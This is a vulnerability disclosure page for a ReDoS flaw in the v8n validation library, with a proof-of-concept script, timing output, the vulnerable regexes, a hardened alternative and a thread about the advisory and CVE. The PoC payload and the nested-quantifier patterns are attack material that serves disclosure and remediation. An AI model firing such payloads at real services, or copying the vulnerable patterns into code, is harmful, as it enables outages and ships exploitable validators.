Inefficient Regular Expression Complexity potentially leads to Denial of Service in imbrn/v8n
Reported on
Jun 29th 2022
Description
Inefficient regular expression complexity in the lowercase() and uppercase() regexes could lead to a denial of service attack. With a crafted payload 'a' + 'a'.repeat(i) + 'A', a payload of only 32 characters took 29443 ms to execute when testing lowercase(). The same issue happens with uppercase().
Proof of Concept
// PoC.js
const v8n = require('v8n')
for (var i = 1; i <= 1000; i++) {
  var time = Date.now();
  // payload: a run of lowercase letters followed by one non-matching character
  var attack_str = 'a' + 'a'.repeat(i) + 'A'
  v8n().lowercase().test(attack_str)
  var time_cost = Date.now() - time;
  console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
}
Output
attack_str.length: 26: 434 ms
attack_str.length: 27: 868 ms
attack_str.length: 28: 1876 ms
attack_str.length: 29: 3641 ms
attack_str.length: 30: 7899 ms
attack_str.length: 31: 14900 ms
attack_str.length: 32: 29443 ms
Impact
Potentially causes a denial of service attack
Occurrences
v8n.js L194
uppercase: () => value => /^([A-Z]+\s*)+$/.test(value),
v8n.js L191
lowercase: () => value => /^([a-z]+\s*)+$/.test(value),
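The nested quantifier in `([a-z]+\s*)+` is what makes the pattern exponential: a run of letters can be split between the inner `[a-z]+` and the outer group in 2^(n-1) ways, and a trailing non-matching character forces the backtracking engine to try them all. The following is an added example, not v8n's code or its actual fix: it places the two regexes quoted above beside an equivalent pattern without a nested quantifier (the hardened pattern is this example's assumption) and checks that both accept the same inputs while only one degrades.

```javascript
// Added example, not part of the v8n project. The hardened patterns below are an
// assumption of this example, not the project's fix.
const VULNERABLE_LOWERCASE = /^([a-z]+\s*)+$/; // as quoted from v8n.js L191
const VULNERABLE_UPPERCASE = /^([A-Z]+\s*)+$/; // as quoted from v8n.js L194

// Same language (starts with a letter, then only letters and whitespace),
// but a single unnested quantifier, so matching is linear in input length.
const HARDENED_LOWERCASE = /^[a-z][a-z\s]*$/;
const HARDENED_UPPERCASE = /^[A-Z][A-Z\s]*$/;

// The report's payload shape: a run of letters, then one character that cannot match.
function attackString(n) {
  return 'a' + 'a'.repeat(n) + 'A';
}

// Time a single regex test; returns both the verdict and the elapsed milliseconds.
function timeTest(regex, input) {
  const start = process.hrtime.bigint();
  const matched = regex.test(input);
  const ms = Number(process.hrtime.bigint() - start) / 1e6;
  return { matched, ms };
}

// A hardened regex is only a valid replacement if it agrees with the original
// on every input; this check guards against silently changing validation semantics.
function agreeOnAll(original, hardened, inputs) {
  return inputs.every((s) => original.test(s) === hardened.test(s));
}

// Constructed sample inputs covering boundaries: empty, leading/trailing whitespace,
// tabs and newlines, digits, mixed case, and a short instance of the attack payload.
const SAMPLES = [
  '', 'a', 'abc', 'ab cd', 'ab cd ', ' ab', 'ab1', 'aB', 'a\tb\nc',
  'AB', 'AB CD ', 'A1', 'a\n', attackString(10),
];

// Only the hardened pattern is run against a long payload; the vulnerable one
// would take tens of seconds at the lengths shown in the report's output.
console.log('lowercase patterns agree:', agreeOnAll(VULNERABLE_LOWERCASE, HARDENED_LOWERCASE, SAMPLES));
console.log('uppercase patterns agree:', agreeOnAll(VULNERABLE_UPPERCASE, HARDENED_UPPERCASE, SAMPLES));
console.log('vulnerable, 20 chars:', timeTest(VULNERABLE_LOWERCASE, attackString(18)));
console.log('hardened, 100002 chars:', timeTest(HARDENED_LOWERCASE, attackString(100000)));
```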
Thank you for the report. The suggested patch by @doublevkay was actually partially correct according to the v8n requirements.
Hey @imbrn @maintainer. Great to see your response.
Could we add a GitHub Security Advisory (GSA) for this vulnerability? It is a good practice to publish vulnerabilities and helps users be aware of the issue. As a researcher, being credited on GSA is my pleasure and helps my work too.
Hello @vovikhangcdv. For sure! And thank you for the amazing work.
Hey @imbrn, how is it going?
Apologies for annoying you. But in case we misunderstand some things, I want to make clear that adding a GHSA is part of a maintainer's work. I don't have the authorization to do it either.
Hi @imbrn, any update for the Security Advisories?
Hi there, can we assign CVE for this issue? @admin, @maintainer
Happy to assign and publish a CVE.
@imbrn - are you happy for me to assign and publish a CVE for this report?
Hi @jamieslome. I requested a CVE in the Github Advisory. https://github.com/imbrn/v8n/security/advisories/GHSA-xrx9-gj26-5wx9
No worries. Once you get the CVE, if you could just ping over the CVE number, I will add it to this report.
Could we also add a reference for this report to the advisory?
Hi @imbrn, can I be credited in the advisory? I would appreciate it a lot. Thank you!
Sure. I'll credit you and also add a reference to this report.
Thank you, imbrn. The CVE was assigned. Can you help to update it on this report, @admin? https://nvd.nist.gov/vuln/detail/CVE-2022-35923